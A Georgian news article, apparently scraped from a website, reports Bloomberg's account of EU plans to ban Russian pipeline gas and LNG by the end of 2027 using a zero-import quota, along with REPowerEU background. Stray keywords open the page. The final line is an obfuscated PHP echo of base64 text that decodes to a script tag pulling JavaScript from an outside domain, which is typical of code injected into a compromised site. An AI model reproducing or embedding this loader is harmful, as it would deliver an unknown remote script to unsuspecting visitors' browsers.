gorgia
jaluzi

ევროპელი ოფიციალური პირები და ბიზნესის წარმომადგენლები ევროკომისიის გეგმის განსახორციელებლად შესაძლო მექანიზმებს განიხილავენ, რომელიც 2027 წლის ბოლომდე რუსეთიდან არსებული კონტრაქტებით მილსადენით გაზისა და თხევადი ბუნებრივი აირის იმპორტის აკრძალვას ითვალისწინებს.

ინფორმაციას Bloomberg ავრცელებს.

პირდაპირი სანქციების შემოღება გამოირიცხა, რომლის დამტკიცებისთვის ევროკავშირის ყველა წევრი სახელმწიფოს ერთსულოვნება არის საჭირო, რაც უნგრეთისა და სლოვაკეთის წინააღმდეგობის გამო ვერ ხერხდება. ამის ნაცვლად, სააგენტოს ცნობით, ევროკავშირს შეუძლია, რუსეთიდან მიწოდება ნულოვანი კვოტის დაწესებით აკრძალოს, რის დასამტკიცებლადაც მხოლოდ კვალიფიციური უმრავლესობის მხარდაჭერა არის საჭირო. ეს ევროპულ კომპანიებს საშუალებას მისცემს, რუს მიმწოდებლებთან დადებული კონტრაქტები ფორსმაჟორულ გარემოებებზე დაყრდნობით შეწყვიტონ.

შესაბამისი წინადადება ოფიციალურად მომავალი თვის შუა რიცხვებში იქნება წარდგენილი, რის შემდეგაც იურისტები დოკუმენტების გაანალიზებას დაიწყებენ, რომ დაადგინონ, საშუალება მიეცემა თუ არა ევროპულ კომპანიებს, რუსული მხარის წინაშე ხელშეკრულებით ნაკისრი ვალდებულებების შესრულებაზე ჯარიმების გადახდის გარეშე თქვან უარი.

ახლახან ევროკომისიამ რუსულ გაზზე უარის თქმის სხვა ინიციატივაც გამოაცხადა. კერძოდ, “საგზაო რუკის” მიხედვით, 2025 წლის ბოლომდე რუსული გაზის იმპორტზე ახალი გარიგებები და სპოტური კონტრაქტები უნდა აიკრძალოს. ევროკომისიას, ასევე, 2027 წლის ბოლომდე რუსეთიდან გაზისა და თხევადი ბუნებრივი აირის იმპორტის აკრძალვა სურს. ამასთან, რუსული გაზის შესყიდვის აკრძალვა ევროკავშირის კომპანიებისთვის შესაძლოა, სავალდებულო გახდეს და კონტრაქტებზე ფორსმაჟორის გამოცხადებას ნიშნავდეს. იურიდიულად სავალდებულო საბოლოო წინადადებები ევროკომისიას ივნისში წარედგინება. ეს ინიციატივები რომ ძალაში შევიდეს, ისინი ევროკავშირის საბჭოში შემავალმა წევრმა სახელმწიფოებმა უნდა დაამტკიცონ.

ცნობისთვის: 2022 წლის მაისში ევროკავშირმა პროგრამა, REPowerEU ჩაუშვა, რომლის მიზანიც 2027 წლისთვის რუსულ გაზზე დამოკიდებულების დასრულებაა. 2022 წლამდე ევროკავშირი თავისი გაზის 40%-ს რუსეთიდან ყიდულობდა, ხოლო 2023 წლისთვის ეს მაჩვენებელი, დაახლოებით, 15%-მდე შემცირდა. თუმცა 2024 წელს მიწოდება ოდნავ, თითქმის, 19%-მდე ისევ გაიზარდა, რამაც ბრიუსელის მხრიდან მწვავე კრიტიკა გამოიწვია.

135
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");